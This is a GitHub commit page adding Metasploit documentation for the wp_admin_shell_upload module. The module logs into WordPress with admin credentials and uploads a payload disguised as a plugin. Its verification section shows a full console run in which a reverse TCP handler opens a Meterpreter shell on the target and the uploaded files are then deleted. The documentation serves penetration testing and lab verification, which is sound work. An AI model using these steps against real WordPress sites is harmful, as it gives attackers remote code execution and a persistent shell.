Skip to content

Commit 47e5f90

Browse files
egyptegypt
committed
Add docs for wp_admin_shell_upload
1 parent 227c0f7 commit 47e5f90

File tree

1 file changed

+51
-0
lines changed

1 file changed

+51
-0
lines changed

documentation/modules/exploit/unix/webapp/wp_admin_shell_upload.md

Lines changed: 51 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,51 @@
1+
## Vulnerable Application
2+
3+
This module takes an administrator username and password, logs into the
4+
admin panel, and uploads a payload packaged as a WordPress plugin.
5+
Becuase this is authenticated code execution by design, it should work
6+
on all versions of WordPress.
7+
8+
### Vulnerable Application Installation
9+
10+
You can get WordPress from [https://wordpress.org/download/](https://wordpress.org/download/)
11+
or from some Linux package managers. [Debian maintains an installation
12+
guide](https://wiki.debian.org/WordPress) that also works on Ubuntu.
13+
Note that in a default install of WP from apt, the plugins directory is
14+
owned by root, so unless you chown it to the web user, this module will
15+
not work. Doing so is common in real-world deployments to allow
16+
legitimate administrators to install plugins, so it is not unreasonable
17+
for your own installation.
18+
19+
20+
## Verification steps
21+
22+
```
23+
msf > use exploit/unix/webapp/wp_admin_shell_upload
24+
msf exploit(wp_admin_shell_upload) > set USERNAME admin
25+
USERNAME => admin
26+
msf exploit(wp_admin_shell_upload) > set PASSWORD password
27+
PASSWORD => password
28+
msf exploit(wp_admin_shell_upload) > set TARGETURI /wp/
29+
TARGETURI => /wp/
30+
msf exploit(wp_admin_shell_upload) > run
31+
32+
[*] Started reverse TCP handler on 0.0.0.0:4444
33+
[*] Authenticating with WordPress using admin:password...
34+
[+] Login successful
35+
[+] Authenticated with WordPress
36+
[*] Preparing payload...
37+
[*] Uploading payload...
38+
[*] Acquired a plugin upload nonce: afa507398f
39+
[*] Uploaded plugin iHNhrYLmGR
40+
[*] Executing the payload at /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php...
41+
[*] Sending stage (33986 bytes) to 192.168.100.131
42+
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.131:40039) at 2017-04-21 11:36:33 -0500
43+
[+] Deleted DcrpFXPOCG.php
44+
[+] Deleted iHNhrYLmGR.php
45+
46+
meterpreter > pwd
47+
/var/lib/wordpress/wp-content/plugins/iHNhrYLmGR
48+
meterpreter >
49+
```
50+
51+

0 commit comments

Comments
 (0)